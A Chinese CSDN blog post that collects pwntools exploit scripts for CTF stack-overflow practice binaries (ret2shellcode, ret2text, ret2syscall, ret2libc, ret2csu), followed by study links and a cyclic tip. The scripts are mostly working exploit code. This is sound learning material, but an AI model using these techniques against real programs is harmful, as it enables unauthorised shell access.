pwn的常用脚本

于 2024-06-14 23:40:09 发布
阅读量494 收藏 10
点赞数
分类专栏: pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/biu801/article/details/139665479
版权

ret2shellcode

#!/usr/bin/env python
from pwn import *
sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080
sh.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
sh.interactive()

 ret2text

from pwn import *
p=process('./ret2text')
addr=0x804863A
p.sendlineafter("anything?",'a'*112+p32(addr))
p.interactive()

ret2syscall (要用到ROPgadget

#!/usr/bin/env python
from pwn import *
p=process('./rop')
int_addr=0x8049421
bin_addr=0x80be408
pop_other_ret=0x806eb90
pop_eax_ret=0x80bb196
payload='a'*112+p32(pop_eax_ret)+p32(0xb)+p32(pop_other_ret)+p32(0)+p32(0)+p32(bin_addr)+p32(int_addr)
p.sendline(payload)
p.interactive()

ret2libc

有/bin/sh

#!/usr/bin/env python
from pwn import *
p=process('./ret2libc1')
bin_addr=0x8048720
sys_addr=0x8048460
payload='a'*112+p32(sys_addr)+p32(0x123)+p32(bin_addr)
p.sendline(payload)
p.interactive()

 调用gets来构造bin/sh

from pwn import *
p=process('./ret2libc2')
sys_addr=0x8048490
get_addr=0x8048460
bss_addr=0x804A080
payload = 'a'*112 +p32(get_addr)+p32(sys_addr)+p32(bss_addr)+p32(bss_addr)
p.sendline(payload)
p.sendline('/bin/sh')
p.interactive()

函数个参数都构造

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
elf=ELF('ret2libc3')
p=process('./ret2libc3')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
start_addr = elf.symbols['_start']
#gdb.attach(p)
payload1='A'*112+p32(puts_plt)+p32(start_addr)+p32(puts_got)
p.sendlineafter("!?",payload1)
puts_addr=u32(p.recv(4))
libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump("puts")
print '='*10
print "libc_base="+hex(libcbase)
print '='*10
print "puts_addr="+hex(puts_addr)
print '='*10
print "libc_dump_puts="+hex(libc.dump('puts'))
print '='*10
system_addr=libcbase+libc.dump("system")
binsh_addr=libcbase+libc.dump("str_bin_sh")
payload2='A'*112+p32(system_addr)+p32(1234)+p32(binsh_addr)
p.sendlineafter("!?",payload2)
p.interactive()

ret2csu

不传参

from pwn import *
p=process('./level3')
sys_addr=0x4005B6
pay='a'*136+p64(sys_addr)
p.sendline(pay)
p.interactive()

只需要传参数

from pwn import *
from LibcSearcher import *
p=process('./level4')
elf=ELF('./level4')

sys_addr=p.recvuntil('\n')
sys_addr=int(sys_addr,16)
libc=LibcSearcher('system',sys_addr)
libc_base=sys_addr-libc.dump('system')
pop_rdi=0x04008b3
bin_sh=libc_base+libc.dump('str_bin_sh')
payload='a'*136+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
p.sendline(payload)
p.interactive()

 

#!/usr/bin/env python
from pwn import *

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p = process('./level4')
#p = remote('127.0.0.1',10001)

binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)

pop_ret_offset = 0x0000000000021102 - libc.symbols['system']
print "pop_ret_offset = " + hex(pop_ret_offset)

#pop_pop_call_offset = 0x00000000000f4739 - libc.symbols['system']
#print "pop_pop_call_offset = " + hex(pop_pop_call_offset)

print "\n##########receiving system addr##########\n"
system_addr_str = p.recvuntil('\n')
system_addr = int(system_addr_str,16)
print "system_addr = " + hex(system_addr)

binsh_addr = system_addr + binsh_addr_offset
print "binsh_addr = " + hex(binsh_addr)


pop_ret_addr = system_addr + pop_ret_offset
print "pop_ret_addr = " + hex(pop_ret_addr)

#pop_pop_call_addr = system_addr + pop_pop_call_offset
#print "pop_pop_call_addr = " + hex(pop_pop_call_addr)

p.recv()

payload = "\x00"*136 + p64(pop_ret_addr) + p64(binsh_addr) + p64(system_addr) 

#payload = "\x00"*136 + p64(pop_pop_call_addr) + p64(system_addr) + p64(binsh_addr) 

print "\n##########sending payload##########\n"
p.send(payload)

p.interactive()

 

#!python
#!/usr/bin/env python
from pwn import *
#context.log_level="debug"
elf = ELF('level5')
libc = ELF('libc.so.6')
p = process('./level5')

got_write = elf.got['write']
print "got_write: " + hex(got_write)
got_read = elf.got['read']
print "got_read: " + hex(got_read)

main = 0x400564

off_system_addr = libc.symbols['write'] - libc.symbols['system']
print "off_system_addr: " + hex(off_system_addr)

#rdi=  edi = r13,  rsi = r14, rdx = r15 
#write(rdi=1, rsi=write.got, rdx=4)
payload1 =  "\x00"*136
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(got_write) + p64(1) + p64(got_write) + p64(8) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload1 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload1 += "\x00"*56
payload1 += p64(main)

p.recvuntil("Hello, World\n")

print "\n#############sending payload1#############\n"
p.send(payload1)
sleep(1)

write_addr = u64(p.recv(8))
print "write_addr: " + hex(write_addr)

system_addr = write_addr - off_system_addr
print "system_addr: " + hex(system_addr)

bss_addr=0x601028

p.recvuntil("Hello, World\n")

#rdi=  edi = r13,  rsi = r14, rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 =  "\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(got_read) + p64(0) + p64(bss_addr) + p64(16) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload2 += "\x00"*56
payload2 += p64(main)

print "\n#############sending payload2#############\n"
p.send(payload2)
sleep(1)

p.send(p64(system_addr))
p.send("/bin/sh\0")
sleep(1)

p.recvuntil("Hello, World\n")

#rdi=  edi = r13,  rsi = r14, rdx = r15 
#system(rdi = bss_addr+8 = "/bin/sh")
payload3 =  "\x00"*136
payload3 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr+8) + p64(0) + p64(0) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload3 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload3 += "\x00"*56
payload3 += p64(main)

print "\n#############sending payload3#############\n"

sleep(1)
p.send(payload3)

p.interactive()

 ROPgadget

视频:【pwn】CTF学习:7、ret2csu补充 | BROP_哔哩哔哩_bilibili

文件: 百度网盘 请输入提取码 

文件:Intermediate ROP · 语雀

ret2_dl_runtime_resolve

视频: 【pwn】CTF学习:8、ret2_dl_runtime_resolve | 栈迁移原理_哔哩哔哩_bilibili

文件:Advanced ROP · 语雀

SROP

视频:【pwn】CTF学习:9、SROP_哔哩哔哩_bilibili

文件:百度网盘 请输入提取码

Stack smash

视频:【pwn】CTF学习:10、Stack smash | partial overwrite_哔哩哔哩_bilibili

格式化字符串

视频:【pwn】CTF学习:11、格式化字符串漏洞_哔哩哔哩_bilibili

cyclic

他是pwndbg的一个工具, 用来计算栈的大小

我么输入: cyclic 200

把输出的东西在gdb中输入进去,得到报错的地址

然后输入: cyclic -l -0x2349

即可得到栈大小

推荐

yichen小菜鸡的个人空间-yichen小菜鸡个人主页-哔哩哔哩视频

全网最硬核PWN入门_图解分析_pwn largbin图解-CSDN博客

yichen的信安知识库 · 语雀

tips:
1.  retn指令实际就是执行了一次pop eip 然后esp+4 紧接着开始执行eip指向的地址

biu801!
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN入门(2)利用缓冲区溢出绕过登录和第一个PwnTools脚本
Ba1_Ma0的博客
09-08 1264
有什么不会或者是错误的地方的可以私信我,看到必回。
pwnscripts:非常简单的脚本可以加快二进制漏洞利用程序的创建
05-06
pwnscripts(0.6.0) 非常简单的脚本,可以加快二进制漏洞利用程序的创建。 要使用,请pip install pwnscripts或运行 git clone https://github.com/152334H/pwnscripts cd pwnscripts pip install -e . 并将from pwn import *替换from pwn import * from pwnscripts import * ,例如 from pwnscripts import * context . binary = './my_challenge' ... 另外, libc_database()扩展需要 。 您可能需要查看user_tests_and_examples.py中的一些示例。 特征 Pwnscripts具有许多不同的功能。 图书馆 像之类的总是感到不完整。
初识 pwn(get_shell、hello_pwn
Welcome To Myon'Blog !
04-01 1039
初识pwn、get_shell、hello_pwn、软件保护机制、exp脚本编写、pwntools、NX、IDA pro
二进制学习(pwn)-带后门的栈溢出
liulanghouzi的博客
09-21 890
帮助pwn爱好者入门~
pwn入门:详解gdb调试程序的常见命令
最新发布
Bossfrank的博客
11-03 2465
本文主要以对一个程序的调试过程为例,介绍gdb调试器的常见命令,并直观的展示所谓“溢出”覆盖的效果以及大小端序的问题。涉及的知识点包括:pwn题目环境的部署、gdb调试的常见命令、大小端序的影响、简单解pwn题目脚本的编写。
pwn 手写Shellcode保姆级教程★
YX-hueimie
10-20 2874
本文章为手写Shellcode的教程,本文章将会围绕 NewStarCTF 2023 WEEK2 中的shellcode revenge一题展开,深入浅出带你一起编写shellcode。学完本文章,你将会有以下收获:加深对shellcode的理解,提升shellcode的编写能力,提升汇编能力,熟练掌握“异或”操作。
pwn100题目文件及exp.zip
08-09
在实践中,分析`pwn100.dms`的二进制文件,理解其执行流程,找到可以触发溢出的输入点,然后编写`pwn100_exp1.py`这样的脚本来生成并发送payload,是解决这个问题的关键步骤。同时,对于初学者来说,理解这些概念并...
总结一些SqlMap的常用tamper脚本释义.docx
02-02
SqlMap 的常用 Tamper 脚本释义 SqlMap 是一个功能强大且广泛使用的 SQL 注入检测工具,它提供了多种 tamper 脚本来帮助用户绕过 Web 应用防火墙(WAF)和入侵检测系统(IDS),从而实现对网站漏洞的检测和利用。...
[pwn基础]Pwntools学习.doc
07-10
1. **pwn 模块**:这个模块是为了 CTF 比赛优化的,通过 `from pwn import *` 导入后,可以使用许多子模块和常用系统库。例如,`process` 函数可以用来启动本地进程并进行通信,`asm` 可以生成汇编代码,`elf` 可以...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
libc-2.27.so是C标准库的一个版本,它包含了许多常用的函数。在Pwn挑战中,知道libc版本很重要,因为这直接影响到溢出漏洞的利用策略。例如,利用者可能需要找到特定版本的glibc中的某些地址(如system函数或one_...
一键搭建pwn环境脚本
03-25
一键搭建pwn环境脚本,安装pwntools, libc-database,vim, ropper, ROPgadget,libc-debug,ssh, one_gadget, pwndbg + pwngdb, 。其中pwntools为python3库 使用方法: chmod +x init_pwn.sh ./init_pwn.sh
pattern.py下载
08-23
`pattern.py`是一个常用的工具,它在漏洞利用过程中扮演着重要的角色。这个脚本常用于生成已知的内存数据模式,这些模式在调试和分析内存泄漏、栈溢出或者缓冲区溢出等安全问题时非常有用。 首先,让我们深入了解...
pwn》ret2libc2—x64简答例题+脚本加解析
Aiyflwoers的博客
03-28 699
题目地址:链接: https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn 提取码:r9vn 脚本展示: from pwn import* p=process('./babyrop') context.log_level='debug' gdb.attach(p) elf=ELF("./babyrop") libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") padding=0x28 pop_rdi_ret_addr=
PWN收发脚本例子
kelxLZ的博客
06-12 455
from pwn import * context.arch = 'amd64' def debug(addr,PIE=True): text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[2], 16) if PIE: info("b* " + hex(text_base+addr)) gdb.attach(p,'b *{}'.format(h
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
Pwn
bluestar628的博客
07-11 2465
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import * p = remote ("139.224.220.67" ,30004) payload = 'a'*0x501 p.sendline(payload) p.interactive()Pwn2打开IDA分析,是一个经...
pwntools之recv,send方法的理解
hanqdi_的博客
07-06 1万+
pwntools学习 一般在做pwn题,写利用脚本时,会用到recv,send等函数,之前我理解问什么send,不理解recv的作用,现在通过一道题目理解了。下面详细讲解下recv及send的作用。 remote(“一个域名或者ip地址”, 端口) 会连接到我们指定的地址及端口。 然后该函数会返回remote对象 (这里,我们将该对象保存到了变量 c)。remote对象主要用来进行对远程主机的输入输出。 主要方法有: 接收远端传回的数据 interactive() : 在取得shell之后使用,直接进行交
pwn学习资料整理——(一)pwn基础
recover517的博客
08-02 1223
PWN常用工具介绍、gdb介绍、常见防护措施介绍
pwn脚本中log.success
04-06
pwn脚本中的log.success是一个函数,用于在控制台输出成功的消息,并以绿色字体显示。它的使用方法如下: ```python from pwn import * # 创建一个pwn连接 conn = remote('127.0.0.1', 1234) # 发送数据 conn.sendline('Hello, World!') # 输出成功消息 log.success('数据发送成功!') # 关闭连接 conn.close() ``` 在执行该脚本时,如果数据成功发送,则会输出绿色字体的“数据发送成功!”消息。这种方式可以让程序员更方便地查看和调试程序运行状态,提高开发效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值